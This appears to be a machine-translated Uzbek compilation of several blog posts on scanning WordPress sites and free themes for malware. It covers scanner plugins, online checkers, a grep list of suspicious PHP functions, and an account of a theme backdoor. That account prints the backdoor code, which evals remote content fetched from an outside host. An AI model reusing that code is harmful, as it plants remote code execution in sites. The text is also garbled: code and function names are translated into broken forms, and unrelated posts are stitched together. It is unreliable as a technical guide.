WordPress turli axborot veb-saytlari va bloglarini yaratish uchun eng mashhur vositadir. Veb-saytingiz xavfsizligi ma'lumotlaringiz xavfsizligidan ko'ra ko'proqdir. Bu juda muhimroq, chunki bu sizning manbangizni o'qigan va ishonadigan barcha foydalanuvchilarning xavfsizligi. Shuning uchun sayt viruslar yoki boshqa zararli kodlar bilan zararlangan emasligi juda muhim.

Quyidagi maqolalardan birida WordPress-ni buzishdan qanday himoya qilishni ko'rib chiqamiz, ammo endi men sizga WordPress veb-saytini viruslar va zararli kodlar uchun qanday tekshirish kerakligini aytmoqchiman, bu hamma narsa xavfsiz ekanligiga ishonch hosil qilish uchun.

Aqlga keladigan birinchi variant - sizni xakerlar buzib, spam yuborish, havolalar va boshqa yomon narsalarni yuborish uchun saytingiz kodiga ularning orqa eshiklarini o'rnatganingizdir. Bu ba'zida sodir bo'ladi, lekin agar siz dasturiy ta'minotni o'z vaqtida yangilasangiz, bu juda kam uchraydigan holat.

Minglab bepul WordPress mavzulari va turli plaginlar mavjud va bu allaqachon tahdid bo'lishi mumkin. WordPress saytidan shablonni yuklab olganingizda, bu boshqa narsa, chap saytdan topganingizda esa boshqa narsa. Vijdonsiz ishlab chiquvchilar o'z mahsulotlariga turli xil zararli kodlarni joylashtirishlari mumkin. Agar siz premium shablonlarni bepul yuklab olsangiz, xakerlar hech narsani xavf ostiga qo'ymasdan qandaydir xavfsizlik teshigini qo'shishlari mumkin bo'lsa, xavf yanada kattaroq bo'ladi, ular orqali ular kirib, kerakli narsani qilishlari mumkin. Shuning uchun WordPress saytida viruslarni tekshirish juda muhim.

WordPress saytini viruslar uchun tekshirish

Saytni tekshirishda siz murojaat qilishingiz kerak bo'lgan birinchi narsa viruslar emas, bu WordPress plaginlari. Tez va osonlik bilan siz saytingizni skanerlashingiz va shubhali kod joylarini topishingiz mumkin, ular mavzuda, plaginda yoki Wodpress-ning o'zida bo'ladimi, ularga e'tibor berish kerak. Keling, eng mashhur plaginlarning bir nechtasini ko'rib chiqaylik:

1.TOC

Ushbu juda oddiy plagin saytingizda o'rnatilgan barcha mavzularni ularda zararli kod bor yoki yo'qligini tekshiradi. Plagin base64 kodini kiritish orqali shifrlangan yashirin havolalarni aniqlaydi, shuningdek, topilgan muammolar haqida batafsil ma'lumotlarni ko'rsatadi. Ko'pincha topilgan kod qismlari viruslar emas, lekin ular potentsial xavfli bo'lishi mumkin, shuning uchun ularga e'tibor berishingiz kerak.

Ochiq "Tashqi ko'rinish" -> "TAK" keyin barcha mavzular tekshirilguncha kuting.

2. VIP skaner

TOC mavzu skaneriga juda o'xshaydi, lekin batafsilroq ma'lumotni ko'rsatadi. Havolalar, yashirin kod va boshqa zararli qo'shimchalarni aniqlash uchun bir xil imkoniyatlar. Asboblar bo'limida VIP skaner elementini oching va natijani tahlil qiling.

Bu keraksiz fayllarni o'chirish uchun etarli bo'lishi mumkin, masalan, desktop.ini. Yoki base64 yordamida fayllarda nima sodir bo'lishini batafsil ko'rib chiqishingiz kerak.

3. GOTMLS.NET dan zararli dasturlarga qarshi

Ushbu plagin nafaqat mavzularni va saytning yadrosini viruslarga skanerlash, balki saytni shafqatsiz kuch parollari va turli XSS, SQLInj hujumlaridan himoya qilish imkonini beradi. Qidiruv ma'lum imzolar va zaifliklar asosida amalga oshiriladi. Ba'zi zaifliklar saytda tuzatilishi mumkin. Fayllarni skanerlashni boshlash uchun oching "Malvarega qarshi" yon menyuda va bosing "Skanerlashni ishga tushirish":

Skanerlashni boshlashdan oldin imzo ma'lumotlar bazangizni yangilashingiz kerak.

4. Wordfence

Bu WordPress xavfsizligi va zararli dasturlarni skanerlash uchun eng mashhur plaginlardan biridir. WordPress kodidagi ko'pgina xatcho'plarni topa oladigan skanerga qo'shimcha ravishda, har xil turdagi hujumlar va parolni qo'pol kuch ishlatishdan doimiy himoya mavjud. Qidiruv vaqtida plagin turli plaginlar va mavzular bilan bog'liq mumkin bo'lgan muammolarni topadi va WordPressni yangilash zarurligi haqida xabar beradi.

Yorliqni oching "WPDefence" yon menyuda va keyin yorlig'iga o'ting "Skanerlash" va bosing "Skanerlashni boshlash":

Skanerlash biroz vaqt talab qilishi mumkin, ammo tugallangach, topilgan muammolar haqida batafsil hisobotni ko'rasiz.

5. Antivirus

Bu sizning veb-saytingiz shablonini zararli kod uchun skanerlaydigan yana bir oddiy plagin. Kamchilik shundaki, faqat joriy shablon skanerdan o'tkaziladi, ammo ma'lumotlar etarli darajada batafsil ko'rsatiladi. Mavzudagi barcha xavfli funktsiyalarni ko'rasiz va keyin ular biron bir xavf tug'diradimi yoki yo'qligini batafsil tahlil qilishingiz mumkin. Element toping "Antivirus" sozlamalarida va keyin bosing "Mavzu shablonlarini hozir skanerlang":

6. Integrity Checker

Virus allaqachon biror joyda yozilgan bo'lsa, WordPress fayllari yaxlitligini tekshirish tavsiya etiladi. Buning uchun Integrity Checker plaginidan foydalanishingiz mumkin. U barcha asosiy, plagin va shablon fayllaridagi o'zgarishlarni tekshiradi. Skanerlash oxirida siz o'zgartirilgan fayllar haqida ma'lumotni ko'rasiz.

Onlayn xizmatlar

Bundan tashqari, WordPress saytida virus borligini tekshirish yoki faqat shablonni tekshirish imkonini beruvchi bir nechta onlayn xizmatlar mavjud. Mana ulardan ba'zilari:

themecheck.org- siz mavzu arxivini yuklab olasiz va unda ishlatilishi mumkin bo'lgan zararli funktsiyalar haqida barcha ogohlantirishlarni ko'rishingiz mumkin. Siz nafaqat mavzuingiz haqidagi ma'lumotlarni, balki boshqa foydalanuvchilar tomonidan yuklangan boshqa mavzular, shuningdek, mavzuning turli versiyalari haqida ham ko'rishingiz mumkin. Plaginlar nima bo'lishidan qat'i nazar, ushbu saytdan topish mumkin. WordPress mavzusini tekshirish ham juda muhim.

virustotal.com- veb-saytingiz yoki shablon faylini viruslarga tekshirishingiz mumkin bo'lgan taniqli manba.

ReScan.pro- ushbu xizmatdan foydalangan holda WordPress saytini viruslar uchun skanerlash bepul; mumkin bo'lgan yo'nalishlarni aniqlash uchun statik va dinamik tahlillar amalga oshiriladi; skaner sayt sahifalarini ochadi. Saytni turli qora ro'yxatlarga qarshi tekshiradi.

sitecheck.sucuri.net- saytlar va mavzularni viruslar uchun skanerlash uchun oddiy xizmat. WordPress uchun plagin mavjud. Xavfli havolalar va skriptlarni aniqlaydi.

Qo'lda tekshirish

Hech narsa qo'lda tekshirishdan yaxshiroq bo'lishi mumkin emas. Linuxda ushbu ajoyib grep yordam dasturi mavjud bo'lib, u fayllar bilan papkada ixtiyoriy satrlarni qidirish imkonini beradi. Biz nimani qidirayotganimizni tushunish qoladi:

eval - bu funksiya o'zboshimchalik bilan PHP kodini bajarishga imkon beradi, u o'zini hurmat qiladigan mahsulotlar tomonidan ishlatilmaydi; agar plaginlardan biri yoki mavzu ushbu funktsiyadan foydalansa, unda virus borligi deyarli 100% ehtimolga ega;

• base64_decode- shifrlash funksiyalari zararli kodni yashirish uchun eval bilan birgalikda ishlatilishi mumkin, lekin ular tinch maqsadlarda ham ishlatilishi mumkin, shuning uchun ehtiyot bo'ling;
• sha1- zararli kodni shifrlashning boshqa usuli;
• gzinflate- siqish funktsiyasi, bir xil maqsadlar, baholash bilan birga, masalan, gzinflate(base64_decode(code);
• strrev- chiziqni oldin emas, orqaga buradi, chunki ibtidoiy shifrlash uchun variantdan foydalanish mumkin;
• chop etish- ma'lumotni brauzerga chiqaradi, gzinflate yoki base64_decode bilan birgalikda bu xavfli;
• file_put_contents- WordPressning o'zi yoki plaginlari hali ham fayl tizimida fayllarni yaratishi mumkin, ammo agar mavzu buni qilsa, siz ehtiyot bo'lishingiz va nima uchun bunday qilishini tekshirishingiz kerak, chunki viruslar o'rnatilishi mumkin;
• file_get_contents- aksariyat hollarda tinch maqsadlarda foydalaniladi, lekin zararli kodni yuklab olish yoki fayllardan ma'lumotlarni o'qish uchun ishlatilishi mumkin;
• jingalak- xuddi shu hikoya;
• fopen- faylni yozish uchun ochadi, siz hech qachon nima maqsadda bilasiz;
• tizimi- funktsiya Linux tizimida buyruqni bajaradi, agar mavzu, plagin yoki wordpressning o'zi buni qilsa, u erda virus bo'lishi mumkin;
• ramziy bog'lanish- tizimda ramziy havolalar yaratadi, ehtimol virus asosiy fayl tizimini tashqaridan kirishga harakat qilmoqda;
• nusxa ko'chirish- faylni bir joydan ikkinchi joyga ko'chiradi;
• getcwd- joriy ishchi katalog nomini qaytaradi;
• cwd- joriy ishchi papkani o'zgartiradi;
• ini_get- PHP sozlamalari haqida ma'lumot oladi, ko'pincha tinch maqsadlarda, lekin siz hech qachon bilmaysiz;
• xato_hisoboti(0)- har qanday xato xabarlarini chiqarishni o'chiradi;
• window.top.joy.href- boshqa sahifalarga yo'naltirish uchun foydalaniladigan javascript funksiyasi;
• buzilgan- shuning uchun, har qanday holatda, biz tekshiramiz, to'satdan xakerning o'zi bizga aytishga qaror qildi.

Har bir alohida so'zni quyidagi kabi buyruq bilan almashtirishingiz mumkin:

grep -R "buzilgan" /var/www/path/to/files/wordpress/wp-content/

Yoki bir vaqtning o'zida barcha so'zlarni qidiradigan oddiy skriptdan foydalaning:

qadriyatlar = "base64_decode(
baholash (base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.joy.href
nusxa (
baho(
tizimi (
ramziy havola (
xato_hisoboti(0)
chop etish
file_get_contents(
file_put_contents(
fopen(
buzilgan"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$qiymatlar" *

Salom do'stlar. Veb-saytlaringiz va bloglaringiz uchun ishlatadigan bepul WordPress shabloningiz haqiqatan ham xavfsiz va yashirin tahdidlar yoki zararli kodlarni o'z ichiga olmaydi. Bunga to'liq ishonchingiz komilmi? Albatta?)

Siz shablonni bosib o'tdingiz, undan yashirin havolalarni olib tashladingiz va ish tugadi deb o'ylaysiz. Siz vaqti-vaqti bilan sayt fayllarini antivirus yordamida skanerlaysiz, Xavfsizlik yorlig'ida Yandex veb-master vositalarini ko'rib chiqasiz va u erda xabarni ko'rishdan xotirjam bo'lasiz: " Saytda hech qanday zararli kod aniqlanmadi«.

Men ham shunday deb o'yladim. Men sizni xafa qilishni xohlamayman, lekin ...

Bepul WordPress shablonlarida yashirin xavfli kod

Bu o'tgan hafta mening hosting kompaniyamdan elektron pochta orqali olgan xat. Yaqinda ular zararli kontentni qidirish uchun barcha sayt fayllarini muntazam tekshirishni joriy qilishdi va ular mendan bu tarkibni topdilar!

Hammasi bir kuni tushdan keyin veb-saytimga kirganimda va uni ishga tushira olmaganimda boshlandi — PHP kengaytmasi topilmagan fayllar haqida haqoratomuz xabar paydo bo'ldi. Bir oz taranglashib, men hostingdagi sayt bilan papkaning mazmunini o'rganishga bordim va darhol muammoni topdim - mening shablon faylim fuctions.php nomini functions.php.malware deb o'zgartirdim, bu noaniq ishora qilgandek tuyuldi - antivirus bu erda ishlayman yoki shunga o'xshash narsa) Pochtaga borib, men yuqoridagi hisobotni hosterdan topdim.

Men qilgan birinchi narsa, albatta, bu faylni tekshirish, uning mazmunini o'rganish, uni barcha turdagi antiviruslar, o'nlab onlayn viruslarni tekshirish xizmatlari va boshqalar bilan skanerlash edi. — oxir-oqibat, hech narsa topilmadi, hamma bir ovozdan fayl butunlay xavfsiz ekanligini ta'kidladi. Albatta, men mezbonga shubhalarimni bildirdim va siz nimanidir chalkashtirib yuborganingizni aytdim, lekin har ehtimolga qarshi, men ulardan zararli kod parchasi aniqlanganligi haqida hisobot berishlarini so'radim.

Va ular menga shunday javob berishdi

Men ushbu kod haqida Google ma'lumotlariga kirdim va jiddiy o'yladim ...

Shablonda zararli kodning bir qismini qanday topish mumkin

Ma'lum bo'lishicha, bu haqiqatan ham ahamiyatsiz bo'lmagan texnika bo'lib, manfaatdor tomonlarga sizning saytingizga ma'lumotlarni uzatish va sahifalar mazmunini sizning xabaringizsiz o'zgartirish imkonini beradi! Agar siz bepul shablondan foydalansangiz, unda Quyidagi kod uchun functions.php ni tekshirishni tavsiya qilaman:

qo'shimcha_filtr('tarkib', '_bloginfo', 10001);
funksiya _bloginfo($content)(
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
$co qaytarish;
) aks holda $kontentni qaytaring;
}

PHP bo'yicha juda sayoz bilimim bilan ham, global o'zgaruvchan post va kontentga bog'langan ma'lum bir filtr yaratilayotgani aniq, ular faqat blog postlari sahifalarida kontentni ko'rsatish uchun javobgardir (is_single sharti). Allaqachon shubhali, shunday emasmi? Keling, ushbu kod bizning veb-saytimizda nimani ko'rsatishini ko'rib chiqaylik.

Ma'lumotlar bazasida so'ralgan qiziqarli variant blogoption ham juda shubhali ko'rinadi. Biz MySQL ma'lumotlar bazasiga kiramiz va u erda wp_options deb nomlangan jadvalni topamiz, agar siz prefikslarni o'zgartirmagan bo'lsangiz, u sukut bo'yicha shunday ko'rinadi. Va unda biz blogoption deb nomlangan bizni qiziqtirgan qatorni topamiz

Qanday go'zal! Biz quyidagi variantni ko'ramiz

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.'&m=47&n'));

Bular. Muayyan saytdan (va ruscha) ular har qanday narsani o'z ichiga olishi mumkin bo'lgan tarkibni qaytarib berishmoqda! Har qanday miqdordagi havolalar, zararli kodlar, o'zgartirilgan matn va boshqalar. Saytning o'ziga kirganingizda, u sizga 403 kirish xatosini beradi, bu ajablanarli emas. Albatta, men bu variantni ma'lumotlar bazasidan ham olib tashladim.

Jabrlanuvchilarning ma'lumotlariga ko'ra, sizning maqolangizning aniq mazmuni odatda biron bir nuqta o'rniga faqat bitta o'zgartirish bilan qaytariladi. matnda ochiq havola yashiringan! Aytgancha, ushbu parametr shablonning o'zi o'rnatilganda ma'lumotlar bazasiga yoziladi va keyin buni muvaffaqiyatli bajaradigan kod o'zini o'zi yo'q qiladi. Va men ikki yil davomida bunday axlat bilan yashadim va shu vaqt ichida biron bir antivirus yoki xizmat menga bu tahdidni aniqlamadi. Rostini aytsam, bu hiyla men uchun ishlaganmi yoki mening xavfsizlik plaginim bu xususiyatni bloklaganmi (yoki WordPress yangilanishlaridan biri bu teshikni yopib qo'ygan bo'lsa), men buni sezmadim, lekin bu hali ham yoqimsiz.

Bepul pishloq haqida axloq

Shablonlarni "tarjimonlarimiz" (yoki ularni o'z kataloglarida joylashtirganlar)ning nafisligi sizga qanday yoqadi? Bu siz pastki qismdagi havolalarni kesib tashlashingiz uchun emas) Afsuski, shablonimni qayerdan yuklab olganimni eslay olmayman, bu uzoq vaqt oldin edi, aks holda men bir nechta mehrli narsalarni yozgan bo'lardim. Va agar o'sha paytda men hozir bo'lgan tajribamga ega bo'lsam, men mutlaqo bepul shablonni ishlatmagan bo'lardim yoki o'ta og'ir holatlarda uni noma'lum manbalardan yuklab olmagan bo'lardim!

15-20 dollarga biron bir rasmiy premium shablonni sotib olish va unda hech qanday teshik yoki shifrlangan havolalar yo'qligini bilib, tinchlikda yashash osonroq, hatto zaifliklar mavjud bo'lsa ham, ishlab chiquvchilar ushbu teshiklar bo'ladigan yangilanishni albatta chiqaradilar. yopiq. ( Aytgancha, Artem yaqinda maqola chop etdi, unda u premium shablonlar haqida gapiradi va hatto qiziquvchilar uchun shafqatsiz chegirmalar uchun reklama kodlarini beradi.)

Salom IdeaFox do'stlari!

Siz haqingizda bilmayman, lekin kechalari uxlay olmayman. Meni blog xavfsizligi muammolari qiynayapti. Menda endi kuch yo'q :-)

Men ushbu mavzu bo'yicha bir nechta bloglarni o'qib chiqdim va bu muammoni hal qilishga yordam beradigan ko'plab plaginlarni sinab ko'rdim. Va sharhlarda ular saytni himoya qilish mavzusi haqida savollar berishni boshladilar, bu meni ushbu eslatmani yozishga undadi.

Tasavvur qiling-a, siz blog yuritasiz, maqolalar yozasiz, harakat qilasiz... Va yovuz eshaklar kelib saytingizni buzadi. Menimcha, qayg'u ko'p bo'ladi.

Axir, har bir oddiy blogger o'z veb-saytini rivojlantirish uchun ko'p vaqt va kuch sarflaydi. Va ko'pchilik uchun blog yuritish odatda obsessiyaga aylanadi ... Bu erda va agar BU sodir bo'lsa :-)

Xo'sh, bu qanchalik muhimligini tushunasiz.

Nihoyat biznesga tushamiz :)

Bir necha oy oldin men xakerlik haqida eslatma yozganman. Uni albatta o'qing. Ammo oradan ancha vaqt o'tdi va men har tomonlama himoyani kuchaytirish uchun qo'shimcha choralar ko'rdim.

Keyingi eslatmalarda men bu masalaga batafsil to'xtalib o'taman. (ISP sozlamalari haqida ham eslayman va yozaman)

3. Boshqa onlayn xizmatlarda saytni tekshiring

Bunday xizmatlarning etishmasligi yo'q. Men ularning ko'pchiligi mutlaqo ahmoq va faqat reklama ko'rsatish uchun yaratilgan degan qat'iy fikrga egaman.

Doktor Web

DR.Web kompaniyasi saytlarni onlayn tekshirish uchun yaxshi xizmat ko'rsatdi. Shaxsan u menga bir marta do'stimning blogida infektsiyani topishga yordam berdi (.htaccess faylida uchinchi tomon kodi bor edi)

Tekshirish juda oddiy. URL manzilingizni kiriting va tekshirish natijasini kuting.

antivirus-alarm.ru

Dunyoning etakchi antivirus kompaniyalarining 43 ta antivirus ma'lumotlar bazasidan foydalanadigan kuchli veb-sayt skaneri.

Bu erda ham hamma narsa juda oddiy. Biz saytimizning URL manzilini kiritamiz va skanerlash natijalarini nafas bilan kutamiz.

Men bularni kutganman.

Hammasi toza, tinch uxlashingiz mumkin :-)

Bularning barchasi, albatta, yaxshi, lekin siz WordPress bloglari uchun hech qanday zarar keltirmaydigan bir nechta plaginlarni o'rnatishingiz kerak.

4. Xostingizdan saytingizni tekshirishni so'rang

Gap shundaki, hosterlar xavfsizlik masalalari haqida sizdan ko'ra ko'proq tashvishlanadilar va kuchli xavfsizlik choralariga ega. Bundan tashqari, maxsus himoya vositalari bilan.

Mana bugun siz uchun yangiligim. Keyinchalik, men sizga WordPress blogingizni buzishdan sezilarli darajada himoya qila oladigan juda kuchli plagin haqida gapirib beraman.

Men u bilan 2 oydan beri ishlayapman va undan juda mamnunman. Tushunib turib, o'zimni 3 marta man qildim: –) Qisqasi, aytadigan gapim bor.

Blog yaratishda eng muhim qadamlardan biri bu yuqori sifatli shablonni tanlashdir. Pullik va bepul saytlar juda ko'p. Biroq, bu erda ehtiyot bo'lishingiz kerak, chunki fayl bilan birga viruslar, zararli skriptlar va yashirin havolalarni olish ehtimoli yuqori.

Ammo shablon xavfsizlik nuqtai nazaridan toza bo'lsa ham va siz uning dizayni, qulayligi va funksionalligidan to'liq qoniqsangiz ham, bu hamma narsa tartibda degani emas. Mavzu haqiqiy HTML va CSS kodiga ega bo'lishi va barcha WordPress CMS standartlariga mos kelishi kerak. Hatto pullik mavzular va maxsus tayyorlangan shablonlarda ham ikkinchisi bilan bog'liq muammolar mavjud.

Dvigatel ishlab chiquvchilari uni doimiy ravishda ishlab chiqmoqdalar va shablon mualliflari ularni yaratishda eskirgan funktsiyalardan foydalangan holda har doim ham ularga mos kelmaydi.

Bugun men sizga WordPress mavzularini standartlarga muvofiqligini tekshirishning 2 usulini ko'rsataman. Ushbu vositalar https://wordpress.org/themes/ rasmiy katalogiga qo'shilganda ishlatiladi.

WordPress mavzulari va Joomla shablonlarini standartlarga muvofiqligini tekshirish xizmati

ThemeCheck.org - bu CMS WordPress va Joomla uchun shablonlarni veb-saytingizga o'rnatishdan oldin ularning xavfsizligi va sifatini tekshirish imkonini beruvchi bepul xizmat.

Mavzuni tekshirish uchun themecheck.org saytidagi “Fayl tanlash” tugmasini bosish orqali uning arxivini kompyuteringizdan yuklab oling. Agar siz skanerlash natijalari xizmatda saqlanishini va boshqa foydalanuvchilar uchun ochiq boʻlishini istamasangiz, “ Natijalardan keyin yuklangan ma'lumotlarni unuting“. Endi "Yuborish" tugmasini bosing.

Masalan, men mavzuni oldim Interfeys, men uni rasmiy veb-saytdan yuklab oldim. 100 tadan 99 tasi - 0 ta muhim xato va 1 ta ogohlantirish. Bu juda yaxshi natija.

Taqqoslash uchun, mening blog shablonim 0 ball oldi (14 xato va 23 ogohlantirish). O'ylaymanki, ko'pchilik uchun natijalar unchalik farq qilmaydi, ayniqsa mavzular allaqachon eskirgan bo'lsa. Fayllar va ular topilgan satrlarni ko'rsatuvchi tushuntirishlar bilan barcha eslatmalar quyida bir xil sahifada joylashgan.

Ochig'i, men u erda ko'p narsani tushunmadim; bu mualliflar uchun foydaliroq bo'lar edi va men uchun hamma narsani tuzatishdan ko'ra shablonni o'zgartirish osonroq. Men buni qachon qilishga qaror qilishimni bilmayman.

Home-da qo'shilgan vaqt yoki reyting bo'yicha saralash qobiliyatiga ega bo'lgan WordPress va Joomla veb-mavzularining katta tanlovi mavjud. Ularni bosganingizda, batafsil ma'lumot va muallifning veb-saytiga va yuklab olish sahifasiga havolalarni ko'rishingiz mumkin.

Agar siz dasturchi bo'lsangiz va sizning mavzuingiz 100% to'g'ri bo'lsa, unda reytingi bo'lgan maxsus nishonni o'rnatish orqali foydalanuvchilarga bu haqda xabar berishingiz mumkin.

ThemeCheck.org xizmatining ahamiyati shundaki, har qanday veb-master undan yuqori sifatli mavzuni blogga o'rnatishdan oldin tanlash uchun foydalanishi mumkin.

Mavzuni tekshirish plagini

Mavzuni tekshirish plaginidan foydalanib, siz allaqachon o'rnatilgan shablonni so'nggi WordPress standartlariga muvofiqligini tekshirishingiz mumkin. Oxirgi versiyani yuklab olish uchun havola: https://wordpress.org/plugins/theme-check/

Plaginning funksionalligi men yuqorida tavsiflangan xizmatga o'xshaydi. Standart o'rnatish va faollashtirishdan so'ng hech qanday sozlashni amalga oshirishning hojati yo'q. Tekshirish tartibi:

1. "Tashqi ko'rinish" - "Mavzuni tekshirish" menyu sahifasiga boshqaruv paneliga o'ting.
2. Agar sizda bir nechta o'rnatilgan bo'lsa, ochiladigan ro'yxatdan kerakli mavzuni tanlang.
3. Agar siz ma'lumot yuborishni xohlamasangiz, "MA'lumotni bostirish" katagiga belgi qo'ying.
4. "Tekshirish" tugmasini bosing.

Natijalar xuddi shu sahifada ko'rsatiladi.

Ko'rib turganingizdek, standart mavzu Yigirma o'n Bu ham ideal emas, lekin, masalan, Yigirma o'n to'rt xatolari yo'q.

Tekshiruvdan so'ng, plaginni o'chirib qo'yish yoki keyingi safargacha butunlay olib tashlash mumkin.

Xulosa. Yangi WordPress shablonini o'rnatishdan oldin uni nafaqat TAC plagini bilan yashirin havolalar va zararli kod, balki ThemeCheck.org xizmati yoki Theme Check plaginining so'nggi CMS standartlariga muvofiqligini tekshiring.

P.S. Yaqinda TopSape Reader-ni ko'rib chiqayotib, men oyiga bosish bo'yicha bloggerlar orasida 1-o'rinni egallagan yangi SEO blogi zenpr.ru-ni ko'rdim. Bir oydan sal oshganini inobatga olsak, natija hurmatga loyiq. Dizayn minimalizm uslubida, agar u umuman yo'q deb aytmasa ham, lekin muallif yozadi - siz uni o'qiysiz. Hammasi aniq va suvsiz. Xuddi blog sarlavhasida bo'lgani kabi - "nol qo'shimcha belgilar". Men uni o'qishni tavsiya qilaman, siz juda ko'p foydali ma'lumotlarni topasiz.